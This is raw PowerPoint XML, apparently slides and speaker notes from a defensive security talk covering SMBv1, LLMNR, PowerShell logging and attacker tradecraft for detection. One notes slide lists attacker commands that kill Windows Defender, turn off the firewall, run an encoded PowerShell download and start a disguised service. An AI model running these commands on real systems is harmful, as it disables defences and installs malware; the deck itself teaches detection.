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68"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="259" r:id="rId3"/>
    <p:sldId id="311" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="272" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="351" r:id="rId9"/>
    <p:sldId id="352" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="354" r:id="rId12"/>
    <p:sldId id="341" r:id="rId13"/>
    <p:sldId id="362" r:id="rId14"/>
    <p:sldId id="355" r:id="rId15"/>
    <p:sldId id="291" r:id="rId16"/>
    <p:sldId id="356" r:id="rId17"/>
    <p:sldId id="321" r:id="rId18"/>
    <p:sldId id="330" r:id="rId19"/>
    <p:sldId id="286" r:id="rId20"/>
    <p:sldId id="357" r:id="rId21"/>
    <p:sldId id="289" r:id="rId22"/>
    <p:sldId id="359" r:id="rId23"/>
    <p:sldId id="288" r:id="rId24"/>
    <p:sldId id="305" r:id="rId25"/>
    <p:sldId id="292" r:id="rId26"/>
    <p:sldId id="303" r:id="rId27"/>
    <p:sldId id="336" r:id="rId28"/>
    <p:sldId id="337" r:id="rId29"/>
    <p:sldId id="364" r:id="rId30"/>
    <p:sldId id="363" r:id="rId31"/>
    <p:sldId id="339" r:id="rId32"/>
    <p:sldId id="340" r:id="rId33"/>
    <p:sldId id="318" r:id="rId34"/>
    <p:sldId id="307" r:id="rId35"/>
    <p:sldId id="342" r:id="rId36"/>
    <p:sldId id="338" r:id="rId37"/>
    <p:sldId id="358" r:id="rId38"/>
    <p:sldId id="285" r:id="rId39"/>
    <p:sldId id="310" r:id="rId40"/>
    <p:sldId id="324" r:id="rId41"/>
    <p:sldId id="325" r:id="rId42"/>
    <p:sldId id="326" r:id="rId43"/>
    <p:sldId id="327" r:id="rId44"/>
    <p:sldId id="328" r:id="rId45"/>
    <p:sldId id="329" r:id="rId46"/>
    <p:sldId id="331" r:id="rId47"/>
    <p:sldId id="290" r:id="rId48"/>
    <p:sldId id="334" r:id="rId49"/>
    <p:sldId id="269" r:id="rId50"/>
    <p:sldId id="335" r:id="rId51"/>
    <p:sldId id="319" r:id="rId52"/>
    <p:sldId id="350" r:id="rId53"/>
    <p:sldId id="348" r:id="rId54"/>
    <p:sldId id="345" r:id="rId55"/>
    <p:sldId id="347" r:id="rId56"/>
    <p:sldId id="346" r:id="rId57"/>
    <p:sldId id="343" r:id="rId58"/>
    <p:sldId id="344" r:id="rId59"/>
    <p:sldId id="274" r:id="rId60"/>
    <p:sldId id="304" r:id="rId61"/>
    <p:sldId id="312" r:id="rId62"/>
    <p:sldId id="299" r:id="rId63"/>
    <p:sldId id="317" r:id="rId64"/>
    <p:sldId id="297" r:id="rId65"/>
    <p:sldId id="271" r:id="rId66"/>
    <p:sldId id="309"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F8726A-80A2-4B15-9C3C-7E31C2185BF0}">
          <p14:sldIdLst>
            <p14:sldId id="259"/>
            <p14:sldId id="311"/>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
            <p14:sldId id="272"/>
            <p14:sldId id="258"/>
            <p14:sldId id="351"/>
            <p14:sldId id="352"/>
            <p14:sldId id="270"/>
            <p14:sldId id="354"/>
            <p14:sldId id="341"/>
            <p14:sldId id="362"/>
            <p14:sldId id="355"/>
            <p14:sldId id="291"/>
            <p14:sldId id="356"/>
            <p14:sldId id="321"/>
            <p14:sldId id="330"/>
            <p14:sldId id="286"/>
            <p14:sldId id="357"/>
            <p14:sldId id="289"/>
            <p14:sldId id="359"/>
            <p14:sldId id="288"/>
            <p14:sldId id="305"/>
            <p14:sldId id="292"/>
            <p14:sldId id="303"/>
            <p14:sldId id="336"/>
            <p14:sldId id="337"/>
            <p14:sldId id="364"/>
            <p14:sldId id="363"/>
            <p14:sldId id="339"/>
            <p14:sldId id="340"/>
            <p14:sldId id="318"/>
            <p14:sldId id="307"/>
            <p14:sldId id="342"/>
            <p14:sldId id="338"/>
            <p14:sldId id="358"/>
            <p14:sldId id="285"/>
            <p14:sldId id="310"/>
            <p14:sldId id="324"/>
            <p14:sldId id="325"/>
            <p14:sldId id="326"/>
            <p14:sldId id="327"/>
            <p14:sldId id="328"/>
            <p14:sldId id="329"/>
            <p14:sldId id="331"/>
            <p14:sldId id="290"/>
            <p14:sldId id="334"/>
            <p14:sldId id="269"/>
            <p14:sldId id="335"/>
            <p14:sldId id="319"/>
            <p14:sldId id="350"/>
            <p14:sldId id="348"/>
            <p14:sldId id="345"/>
            <p14:sldId id="347"/>
            <p14:sldId id="346"/>
            <p14:sldId id="343"/>
            <p14:sldId id="344"/>
            <p14:sldId id="274"/>
            <p14:sldId id="304"/>
            <p14:sldId id="312"/>
            <p14:sldId id="299"/>
            <p14:sldId id="317"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{C10107FF-10C0-493F-8DA0-C54B17AC49F2}">
          <p14:sldIdLst>
            <p14:sldId id="297"/>
            <p14:sldId id="271"/>
            <p14:sldId id="309"/>
          </p14:sldIdLst>
        </p14:section>
      </p14:sectionLst>
    </p:ex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1" autoAdjust="0"/>
    <p:restoredTop sz="88284" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="29" d="100"/>
          <a:sy n="29" d="100"/>
        </p:scale>
        <p:origin x="3144" y="30"/>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0284E-F5DB-44CC-ADA7-48F93C0421A6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/22/2018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E1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1222937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ietf.org/rfc4795.tx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reload=9&amp;v=1LZCb4HJlkI"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creencast-o-matic.com/u/vqZ/BuildMacroExploitEmpir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creencast-o-matic.com/u/vqZ/BuildMacroExploitEmpir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dsecurity.org/?p=2277"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cloudblogs.microsoft.com/microsoftsecure/2018/08/13/cybersecurity-threats-how-to-discover-remediate-and-mitigate/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BloodHoundAD/BloodHound"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ecurity.stackexchange.com/questions/30654/why-doesnt-microsoft-implement-salt-on-users-passwords-in-windows"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technet.microsoft.com/en-us/library/hh994559.aspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dsinternals.com/en/download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creencast-o-matic.com/u/vqZ/CrackHashResponde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Act like the adversary and create detections for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network attacks, and Host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Living off the Land: DCOM, WMI, API, EXE attacks, Website attacks, AD attack</a:t>
            </a:r>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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4234688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WannaCry is the Why?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283773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it says SMBv1 to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>now</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://malwareless.com/wannacry-ransomware-massively-attacks-computer-systems-world/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.shodan.io/search?query=port%3A445+%22SMB+Version%3A+1%22+os%3AWindows+%21product%3ASamba</a:t>
            </a:r>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426130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Disable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> LLMNR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Why should you care?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B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIS Controls: 9 Limitation and Control of Network Ports, Protocols, and Services </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://attack.mitre.org/wiki/Technique/T1171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cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>HKLM\Software\Policies\Microsoft\Windows NT\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>DNSClient</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> for changes to the "</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>EnableMulticast</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>" DWORD value. A value of “0” indicates LLMNR is disabled </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="36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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320459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DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LLMNR operates on Port 5355</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LLMNR has been documented as an informal RFC by the IETF in RFC 4795 (January 2007) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.ietf.org/rfc4795.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://medium.com/@rootsecdev/an-in-depth-look-at-server-2019-and-windows-10-rs5-security-baselines-52508a986c16</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1213391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(disable) - PS Script block logging  - Set this to ENABLED!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why Should I care?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://community.idera.com/powershell/powertips/b/tips/posts/understanding-script-block-logging-part-1</a:t>
            </a:r>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="436710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start logging?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now that its logging how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> do I know what the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>EventIDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> are in the logs? Have no fear Cheat Sheets are here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Next Slide: Why Module Logging? Here is why</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html</a:t>
            </a:r>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2446789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https://www.malwarearchaeology.com/cheat-sheets</a:t>
            </a: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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97524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Enable Logging (even if you don’t have a central logging)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ok,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> how do we even know about enabling logging or secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>configs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>? CIS-CAT is a good start.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Logging is another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Monitoring the right logs is another.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28055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how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to securely protect via Secure Configs lets see an attacker…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Next Slide: Now lets switch gears and start talking Adversary.</a:t>
            </a:r>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3679200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chain of events that an adversary may take.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A possible path an Attacker may take.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does that mean? What are the procedures?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4</a:t>
            </a:r>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153591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attending!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provide this slide deck, so we may concentrate on this being more of a conversation among friends and peers. Kind of like a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MeetUp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Hope this arms everyone with resources to detect, and secure UW devices.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2358558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schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>what patches, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Qwinsta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Who is logged in to steal tokens?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>taskkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /f /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>im</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> MsMpEng.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kill Windows Defender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>advfirewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>currentprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> state off (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TurnOFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -exec bypass -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EncodedCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cABvAHcAZQByAHMAaABl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download C2C exe from Inter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sc.exe start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>svvchost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start Evil exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
